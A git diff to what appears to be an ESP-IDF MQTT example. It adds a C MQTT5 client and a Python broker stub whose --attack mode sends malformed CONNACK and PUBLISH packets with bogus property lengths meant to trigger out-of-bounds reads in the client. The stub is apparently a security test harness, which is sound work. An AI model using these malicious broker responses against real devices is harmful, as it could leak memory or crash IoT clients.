diff --git a/examples/mqtt/main/CMakeLists.txt b/examples/mqtt/main/CMakeLists.txt index 1874b134b0..049c1c34df 100644 --- a/examples/mqtt/main/CMakeLists.txt +++ b/examples/mqtt/main/CMakeLists.txt @@ -1,2 +1,6 @@ -idf_component_register(SRCS "app_main.cpp" +idf_component_register(SRCS "app_main.c" INCLUDE_DIRS ".") + + # target_compile_options(${COMPONENT_LIB} PUBLIC -fsanitize=address) + # target_link_options(${COMPONENT_LIB} PUBLIC -fsanitize=address) + \ No newline at end of file diff --git a/examples/mqtt/main/app_main.c b/examples/mqtt/main/app_main.c new file mode 100644 index 0000000000..8946181f00 --- /dev/null +++ b/examples/mqtt/main/app_main.c @@ -0,0 +1,210 @@ +/* + * SPDX-FileCopyrightText: 2023-2026 Espressif Systems (Shanghai) CO LTD + * + * SPDX-License-Identifier: Unlicense OR CC0-1.0 + */ +#include +#include +#include +#include +#include +#include "esp_system.h" +#include "nvs_flash.h" +#include "esp_event.h" +#include "esp_netif.h" +#include "protocol_examples_common.h" +#include "esp_log.h" +#include "mqtt_client.h" +#include "mqtt5_client.h" +#include "sdkconfig.h" + +static const char *TAG = "mqtt5_example"; + + +static void log_error_if_nonzero(const char *message, int error_code) +{ + if (error_code != 0) { + ESP_LOGE(TAG, "Last error %s: 0x%x", message, error_code); + } +} + +/* + * @brief Event handler registered to receive MQTT events + * + * This function is called by the MQTT client event loop. + * + * @param handler_args user data registered to the event. + * @param base Event base for the handler(always MQTT Base in this example). + * @param event_id The id for the received event. + * @param event_data The data for the event, esp_mqtt_event_handle_t. + */ +static esp_mqtt5_user_property_item_t user_property_arr[] = { + {"board", "esp32"}, + {"u", "user"}, + {"p", "password"} +}; + +#define USE_PROPERTY_ARR_SIZE sizeof(user_property_arr)/sizeof(esp_mqtt5_user_property_item_t) + +static void print_user_property(mqtt5_user_property_handle_t user_property) +{ + if (user_property) { + uint8_t count = esp_mqtt5_client_get_user_property_count(user_property); + if (count) { + esp_mqtt5_user_property_item_t *item = malloc(count * sizeof(esp_mqtt5_user_property_item_t)); + if (esp_mqtt5_client_get_user_property(user_property, item, &count) == ESP_OK) { + for (int i = 0; i < count; i++) { + esp_mqtt5_user_property_item_t *t = &item[i]; + ESP_LOGI(TAG, "key is %s, value is %s", t->key, t->value); + free((char *)t->key); + free((char *)t->value); + } + } + free(item); + } + } +} + +static void mqtt5_event_handler(void *handler_args, esp_event_base_t base, int32_t event_id, void *event_data) +{ + ESP_LOGD(TAG, "Event dispatched from event loop base=%s, event_id=%" PRIi32, base, event_id); + esp_mqtt_event_handle_t event = event_data; + esp_mqtt_client_handle_t client = event->client; + int msg_id; + + ESP_LOGD(TAG, "free heap size is %" PRIu32 ", minimum %" PRIu32, esp_get_free_heap_size(), esp_get_minimum_free_heap_size()); + switch ((esp_mqtt_event_id_t)event_id) { + case MQTT_EVENT_CONNECTED: + ESP_LOGI(TAG, "MQTT_EVENT_CONNECTED"); + esp_mqtt_client_disconnect(client); + // print_user_property(event->property->user_property); + // msg_id = esp_mqtt_client_subscribe(client, "sensor/data", 0); + // ESP_LOGI(TAG, "sent subscribe successful, msg_id=%d", msg_id); + break; + case MQTT_EVENT_DISCONNECTED: + ESP_LOGI(TAG, "MQTT_EVENT_DISCONNECTED"); + print_user_property(event->property->user_property); + break; + + case MQTT_EVENT_SUBSCRIBED: + ESP_LOGI(TAG, "MQTT_EVENT_SUBSCRIBED, msg_id=%d, reason code=0x%02x ", event->msg_id, (uint8_t)*event->data); + print_user_property(event->property->user_property); + break; + case MQTT_EVENT_UNSUBSCRIBED: + ESP_LOGI(TAG, "MQTT_EVENT_UNSUBSCRIBED, msg_id=%d", event->msg_id); + print_user_property(event->property->user_property); + break; + case MQTT_EVENT_PUBLISHED: + ESP_LOGI(TAG, "MQTT_EVENT_PUBLISHED, msg_id=%d", event->msg_id); + print_user_property(event->property->user_property); + break; + case MQTT_EVENT_DATA: + ESP_LOGI(TAG, "MQTT_EVENT_DATA"); + print_user_property(event->property->user_property); + ESP_LOGI(TAG, "payload_format_indicator is %d", event->property->payload_format_indicator); + ESP_LOGI(TAG, "response_topic is %.*s", event->property->response_topic_len, event->property->response_topic); + ESP_LOGI(TAG, "correlation_data is %.*s", event->property->correlation_data_len, event->property->correlation_data); + ESP_LOGI(TAG, "content_type is %.*s", event->property->content_type_len, event->property->content_type); + ESP_LOGI(TAG, "TOPIC=%.*s", event->topic_len, event->topic); + printf("data length: %d\n", event->data_len); + for (int i = 0; i < /*(uint32_t)*/event->data_len; i++) { + printf("%02x ", event->data[i]); + } + printf("\n"); + // ESP_LOGI(TAG, "DATA=%.*s", event->data_len, event->data); + break; + case MQTT_EVENT_ERROR: + ESP_LOGI(TAG, "MQTT_EVENT_ERROR"); + print_user_property(event->property->user_property); + ESP_LOGI(TAG, "MQTT5 return code is %d", event->error_handle->connect_return_code); + if (event->error_handle->error_type == MQTT_ERROR_TYPE_TCP_TRANSPORT) { + log_error_if_nonzero("reported from esp-tls", event->error_handle->esp_tls_last_esp_err); + log_error_if_nonzero("reported from tls stack", event->error_handle->esp_tls_stack_err); + log_error_if_nonzero("captured as transport's socket errno", event->error_handle->esp_transport_sock_errno); + ESP_LOGI(TAG, "Last errno string (%s)", strerror(event->error_handle->esp_transport_sock_errno)); + + } + break; + default: + ESP_LOGI(TAG, "Other event id:%d", event->event_id); + break; + } +} + +static void mqtt5_app_start(void) +{ + esp_mqtt5_connection_property_config_t connect_property = { + .session_expiry_interval = 10, + .maximum_packet_size = 1024, + .receive_maximum = 65535, + .topic_alias_maximum = 2, + .request_resp_info = true, + .request_problem_info = true, + .will_delay_interval = 10, + .payload_format_indicator = true, + .message_expiry_interval = 10, + .response_topic = "/test/response", + .correlation_data = "123456", + .correlation_data_len = 6, + }; + const esp_mqtt_client_config_t mqtt5_cfg = { + .broker = { + .address.uri = "mqtt://127.0.0.1:1883", + }, + .session = { + .protocol_ver = MQTT_PROTOCOL_V_5, + .last_will = { + .topic = "/topic/will", + .msg = "i will leave", + .msg_len = 12, + .qos = 1, + .retain = true, + }, + }, + }; + + esp_mqtt_client_handle_t client = esp_mqtt_client_init(&mqtt5_cfg); + + /* Set connection properties and user properties */ + esp_mqtt5_client_set_user_property(&connect_property.user_property, user_property_arr, USE_PROPERTY_ARR_SIZE); + esp_mqtt5_client_set_user_property(&connect_property.will_user_property, user_property_arr, USE_PROPERTY_ARR_SIZE); + esp_mqtt5_client_set_connect_property(client, &connect_property); + + /* If you call esp_mqtt5_client_set_user_property to set user properties, DO NOT forget to delete them. + * esp_mqtt5_client_set_connect_property will malloc buffer to store the user_property and you can delete it after + */ + esp_mqtt5_client_delete_user_property(connect_property.user_property); + esp_mqtt5_client_delete_user_property(connect_property.will_user_property); + + /* The last argument may be used to pass data to the event handler, in this example mqtt_event_handler */ + esp_mqtt_client_register_event(client, ESP_EVENT_ANY_ID, mqtt5_event_handler, NULL); + esp_mqtt_client_start(client); +} + + +void app_main(void) +{ + ESP_LOGI(TAG, "[APP] Startup.."); + ESP_LOGI(TAG, "[APP] Free memory: %" PRIu32 " bytes", esp_get_free_heap_size()); + ESP_LOGI(TAG, "[APP] IDF version: %s", esp_get_idf_version()); + + // esp_log_level_set("*", ESP_LOG_INFO); + // esp_log_level_set("mqtt_client", ESP_LOG_VERBOSE); + // esp_log_level_set("mqtt5_example", ESP_LOG_VERBOSE); + // esp_log_level_set("transport_base", ESP_LOG_VERBOSE); + // esp_log_level_set("esp-tls", ESP_LOG_VERBOSE); + // esp_log_level_set("transport", ESP_LOG_VERBOSE); + // esp_log_level_set("outbox", ESP_LOG_VERBOSE); + + ESP_ERROR_CHECK(nvs_flash_init()); + ESP_ERROR_CHECK(esp_netif_init()); + ESP_ERROR_CHECK(esp_event_loop_create_default()); + + /* This helper function configures Wi-Fi or Ethernet, as selected in menuconfig. + * Read "Establishing Wi-Fi or Ethernet Connection" section in + * examples/protocols/README.md for more information about this function. + */ + ESP_ERROR_CHECK(example_connect()); + + mqtt5_app_start(); +} diff --git a/examples/mqtt/main/app_main.cpp b/examples/mqtt/main/app_main.cpp deleted file mode 100644 index f51116f9fb..0000000000 --- a/examples/mqtt/main/app_main.cpp +++ /dev/null @@ -1,136 +0,0 @@ -/* - * SPDX-FileCopyrightText: 2023-2024 Espressif Systems (Shanghai) CO LTD - * - * SPDX-License-Identifier: Unlicense OR CC0-1.0 - */ -#include -#include -#include -#include -#include "esp_system.h" -#include "nvs_flash.h" -#include "esp_event.h" -#include "esp_netif.h" -#include "protocol_examples_common.h" -#include "esp_netif.h" -#include "esp_system.h" - -#include "esp_log.h" -#include "mqtt_client.h" - -static const char *TAG = "esp_mqtt_demo"; - - -static void log_error_if_nonzero(const char *message, int error_code) -{ - if (error_code != 0) { - ESP_LOGE(TAG, "Last error %s: 0x%x", message, error_code); - } -} - -/* - * @brief Event handler registered to receive MQTT events - * - * This function is called by the MQTT client event loop. - * - * @param handler_args user data registered to the event. - * @param base Event base for the handler(always MQTT Base in this example). - * @param event_id The id for the received event. - * @param event_data The data for the event, esp_mqtt_event_handle_t. - */ -static void mqtt_event_handler(void *handler_args, esp_event_base_t base, int32_t event_id, void *event_data) -{ - ESP_LOGD(TAG, "Event dispatched from event loop base=%s, event_id=%" PRIi32 "", base, event_id); - auto event = (esp_mqtt_event_handle_t)event_data; - esp_mqtt_client_handle_t client = event->client; - int msg_id; - switch ((esp_mqtt_event_id_t)event_id) { - case MQTT_EVENT_CONNECTED: - ESP_LOGI(TAG, "MQTT_EVENT_CONNECTED"); - msg_id = esp_mqtt_client_publish(client, "/topic/qos1", "data_3", 0, 1, 0); - ESP_LOGI(TAG, "sent publish successful, msg_id=%d", msg_id); - - msg_id = esp_mqtt_client_subscribe(client, "/topic/qos0", 0); - ESP_LOGI(TAG, "sent subscribe successful, msg_id=%d", msg_id); - - msg_id = esp_mqtt_client_subscribe(client, "/topic/qos1", 1); - ESP_LOGI(TAG, "sent subscribe successful, msg_id=%d", msg_id); - - msg_id = esp_mqtt_client_unsubscribe(client, "/topic/qos1"); - ESP_LOGI(TAG, "sent unsubscribe successful, msg_id=%d", msg_id); - break; - case MQTT_EVENT_DISCONNECTED: - ESP_LOGI(TAG, "MQTT_EVENT_DISCONNECTED"); - break; - - case MQTT_EVENT_SUBSCRIBED: - ESP_LOGI(TAG, "MQTT_EVENT_SUBSCRIBED, msg_id=%d", event->msg_id); - msg_id = esp_mqtt_client_publish(client, "/topic/qos0", "data", 0, 0, 0); - ESP_LOGI(TAG, "sent publish successful, msg_id=%d", msg_id); - break; - case MQTT_EVENT_UNSUBSCRIBED: - ESP_LOGI(TAG, "MQTT_EVENT_UNSUBSCRIBED, msg_id=%d", event->msg_id); - break; - case MQTT_EVENT_PUBLISHED: - ESP_LOGI(TAG, "MQTT_EVENT_PUBLISHED, msg_id=%d", event->msg_id); - break; - case MQTT_EVENT_DATA: - ESP_LOGI(TAG, "MQTT_EVENT_DATA"); - printf("TOPIC=%.*s\r\n", event->topic_len, event->topic); - printf("DATA=%.*s\r\n", event->data_len, event->data); - break; - case MQTT_EVENT_ERROR: - ESP_LOGI(TAG, "MQTT_EVENT_ERROR"); - if (event->error_handle->error_type == MQTT_ERROR_TYPE_TCP_TRANSPORT) { - log_error_if_nonzero("reported from esp-tls", event->error_handle->esp_tls_last_esp_err); - log_error_if_nonzero("reported from tls stack", event->error_handle->esp_tls_stack_err); - log_error_if_nonzero("captured as transport's socket errno", event->error_handle->esp_transport_sock_errno); - ESP_LOGI(TAG, "Last errno string (%s)", strerror(event->error_handle->esp_transport_sock_errno)); - - } - break; - default: - ESP_LOGI(TAG, "Other event id:%d", event->event_id); - break; - } -} - -static void mqtt_app_start() -{ - esp_mqtt_client_config_t mqtt_cfg = {}; - mqtt_cfg.broker.address.uri = CONFIG_BROKER_URL; - mqtt_cfg.credentials.client_id = "idf_on_linux_client"; - - esp_mqtt_client_handle_t client = esp_mqtt_client_init(&mqtt_cfg); - /* The last argument may be used to pass data to the event handler, in this example mqtt_event_handler */ - esp_mqtt_client_register_event(client, (esp_mqtt_event_id_t)ESP_EVENT_ANY_ID, mqtt_event_handler, NULL); - esp_mqtt_client_start(client); -} - - -extern "C" void app_main(void) -{ - ESP_LOGI(TAG, "[APP] Startup.."); - ESP_LOGI(TAG, "[APP] Free memory: %" PRIu32 " bytes", esp_get_free_heap_size()); - ESP_LOGI(TAG, "[APP] IDF version: %s", esp_get_idf_version()); - - esp_log_level_set("*", ESP_LOG_INFO); - esp_log_level_set("mqtt_client", ESP_LOG_VERBOSE); - esp_log_level_set("esp_mqtt_demo", ESP_LOG_VERBOSE); - esp_log_level_set("transport_base", ESP_LOG_VERBOSE); - esp_log_level_set("esp-tls", ESP_LOG_VERBOSE); - esp_log_level_set("transport", ESP_LOG_VERBOSE); - esp_log_level_set("outbox", ESP_LOG_VERBOSE); - - ESP_ERROR_CHECK(nvs_flash_init()); - ESP_ERROR_CHECK(esp_netif_init()); - ESP_ERROR_CHECK(esp_event_loop_create_default()); - - /* This helper function configures Wi-Fi or Ethernet, as selected in menuconfig. - * Read "Establishing Wi-Fi or Ethernet Connection" section in - * examples/protocols/README.md for more information about this function. - */ - ESP_ERROR_CHECK(example_connect()); - - mqtt_app_start(); -} diff --git a/examples/mqtt/mqtt5_broker_stub.py b/examples/mqtt/mqtt5_broker_stub.py new file mode 100644 index 0000000000..4a925155df --- /dev/null +++ b/examples/mqtt/mqtt5_broker_stub.py @@ -0,0 +1,246 @@ +#!/usr/bin/env python3 +# SPDX-FileCopyrightText: 2026 Espressif Systems (Shanghai) CO LTD +# SPDX-License-Identifier: Unlicense OR CC0-1.0 +""" +Minimal MQTT v5 broker stub. + +Supports only CONNECT and replies with a basic CONNACK, or a malicious +CONNACK when --attack=conack/connack is enabled. +All other packets are read and ignored to keep the TCP session open. +""" + +from __future__ import annotations + +import argparse +import logging +import socket +import socketserver + +PACKET_TYPES = { + 1: "CONNECT", + 2: "CONNACK", + 3: "PUBLISH", + 4: "PUBACK", + 5: "PUBREC", + 6: "PUBREL", + 7: "PUBCOMP", + 8: "SUBSCRIBE", + 9: "SUBACK", + 10: "UNSUBSCRIBE", + 11: "UNSUBACK", + 12: "PINGREQ", + 13: "PINGRESP", + 14: "DISCONNECT", + 15: "AUTH", +} + + +def read_exact(sock: socket.socket, nbytes: int) -> bytes: + data = bytearray() + while len(data) < nbytes: + chunk = sock.recv(nbytes - len(data)) + if not chunk: + break + data.extend(chunk) + if len(data) != nbytes: + raise ConnectionError("socket closed while reading payload") + return bytes(data) + + +def decode_varint_from_socket(sock: socket.socket) -> int: + multiplier = 1 + value = 0 + for i in range(4): + byte = sock.recv(1) + if not byte: + raise ConnectionError("socket closed while reading varint") + encoded = byte[0] + value += (encoded & 0x7F) * multiplier + if (encoded & 0x80) == 0: + return value + multiplier *= 128 + raise ValueError("malformed varint (exceeds 4 bytes)") + + +def encode_varint(value: int) -> bytes: + if value < 0: + raise ValueError("varint must be non-negative") + out = bytearray() + while True: + encoded = value % 128 + value //= 128 + if value > 0: + encoded |= 0x80 + out.append(encoded) + if value == 0: + break + return bytes(out) + + +def build_connack(session_present: int = 0, reason_code: int = 0) -> bytes: + # MQTT v5 CONNACK: [0x20][remaining_len][ack_flags][reason][props_len=0] + payload = bytes([session_present & 0x01, reason_code & 0xFF, 0x00]) + return bytes([0x20]) + encode_varint(len(payload)) + payload + + +def build_malicious_connack( + property_id: int = 0x12, + leak_len: int = 256, + padding_len: int = 0, +) -> bytes: + # MQTT v5 CONNACK with a bogus properties length varint to trigger OOB reads. + if not (0 <= property_id <= 0xFF): + raise ValueError("property_id must fit in one byte") + if not (0 <= leak_len <= 0xFFFF): + raise ValueError("leak_len must fit in two bytes") + if padding_len < 0: + raise ValueError("padding_len must be non-negative") + + prop_len_field = bytes([0xFF, 0xFF, 0xFF, 0x7F]) # 268,435,455 + property_bytes = bytes([property_id]) + leak_len.to_bytes(2, "big") + payload = bytes([0x00, 0x00]) + prop_len_field + property_bytes + (b"A" * padding_len) + return bytes([0x20]) + encode_varint(len(payload)) + payload + + +def build_suback(packet_id: int, reason_code: int = 0) -> bytes: + # MQTT v5 SUBACK: [0x90][remaining_len][packet_id][props_len=0][reason] + payload = packet_id.to_bytes(2, "big") + bytes([0x00, reason_code & 0xFF]) + return bytes([0x90]) + encode_varint(len(payload)) + payload + + +def build_property_stream_even(target_len: int) -> bytes: + # Build a stream of valid 2-byte properties (Payload Format Indicator). + if target_len % 2 != 0: + raise ValueError("target_len must be even for 2-byte properties") + return bytes([0x01, 0x01]) * (target_len // 2) + + +def build_malicious_publish(topic: str = "sensor/data") -> bytes: + # QoS 0 PUBLISH + topic_bytes = topic.encode("utf-8") + topic_len = len(topic_bytes) + property_len_value = 3000 + prop_len_field = encode_varint(property_len_value) + + # Keep Remaining Length smaller than property_len_value to drive OOB reads, + # while filling the actual packet with valid property IDs. + remaining_len = 1001 + header_len = 2 + topic_len + len(prop_len_field) + data_len = remaining_len - header_len + if data_len <= 0 or data_len % 2 != 0: + raise ValueError("remaining_len must yield a positive even data length") + + props_len = 200 + if props_len > data_len or props_len % 2 != 0: + props_len = data_len + payload_len = data_len - props_len + + props = build_property_stream_even(props_len) + payload = build_property_stream_even(payload_len) + + variable_header = ( + topic_len.to_bytes(2, "big") + + topic_bytes + + prop_len_field + + props + + payload + ) + return bytes([0x30]) + encode_varint(remaining_len) + variable_header + + +class MQTTStubHandler(socketserver.BaseRequestHandler): + attack_mode = "publish" + + def handle(self) -> None: + sock: socket.socket = self.request + peer = f"{self.client_address[0]}:{self.client_address[1]}" + logging.info("client connected: %s", peer) + try: + self._serve(sock, peer) + except (ConnectionError, ValueError) as exc: + logging.info("client %s disconnected: %s", peer, exc) + except Exception: + logging.exception("unexpected error for client %s", peer) + finally: + try: + sock.close() + except OSError: + pass + logging.info("client closed: %s", peer) + + def _serve(self, sock: socket.socket, peer: str) -> None: + while True: + first = sock.recv(1) + if not first: + raise ConnectionError("socket closed") + + packet_type = first[0] >> 4 + flags = first[0] & 0x0F + remaining_len = decode_varint_from_socket(sock) + payload = read_exact(sock, remaining_len) if remaining_len else b"" + + name = PACKET_TYPES.get(packet_type, f"UNKNOWN({packet_type})") + logging.info( + "rx %s flags=0x%x remaining_len=%d from %s", + name, + flags, + remaining_len, + peer, + ) + + if packet_type == 1: # CONNECT + if self.attack_mode in ("conack", "connack"): + connack = build_malicious_connack() + sock.sendall(connack) + logging.info("tx malicious CONNACK to %s (attack=%s)", peer, self.attack_mode) + else: + connack = build_connack() + sock.sendall(connack) + logging.info("tx CONNACK to %s", peer) + elif packet_type == 8: # SUBSCRIBE + if len(payload) < 2: + raise ValueError("malformed SUBSCRIBE (no packet id)") + packet_id = int.from_bytes(payload[0:2], "big") + suback = build_suback(packet_id) + sock.sendall(suback) + logging.info("tx SUBACK to %s (packet_id=%d)", peer, packet_id) + if self.attack_mode == "publish": + malicious = build_malicious_publish() + sock.sendall(malicious) + logging.info("tx malicious PUBLISH to %s", peer) + # For now, ignore all other packet types and keep the TCP session open. + + +class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): + allow_reuse_address = True + daemon_threads = True + + +def parse_args() -> argparse.Namespace: + parser = argparse.ArgumentParser(description="Minimal MQTT v5 broker stub") + parser.add_argument("--host", default="0.0.0.0", help="bind host") + parser.add_argument("--port", default=1883, type=int, help="bind port") + parser.add_argument("--log-level", default="INFO", help="logging level") + parser.add_argument( + "--attack", + default="publish", + choices=("none", "publish", "conack", "connack"), + help="malicious response type", + ) + return parser.parse_args() + + +def main() -> None: + args = parse_args() + logging.basicConfig(level=args.log_level.upper(), format="%(asctime)s %(levelname)s %(message)s") + MQTTStubHandler.attack_mode = args.attack + with ThreadingTCPServer((args.host, args.port), MQTTStubHandler) as server: + logging.info("MQTT v5 stub listening on %s:%d", args.host, args.port) + try: + server.serve_forever() + except KeyboardInterrupt: + logging.info("shutting down") + + +if __name__ == "__main__": + main() diff --git a/examples/mqtt/sdkconfig.defaults b/examples/mqtt/sdkconfig.defaults index e69de29bb2..db60a2ab38 100644 --- a/examples/mqtt/sdkconfig.defaults +++ b/examples/mqtt/sdkconfig.defaults @@ -0,0 +1 @@ +CONFIG_MQTT_PROTOCOL_5=y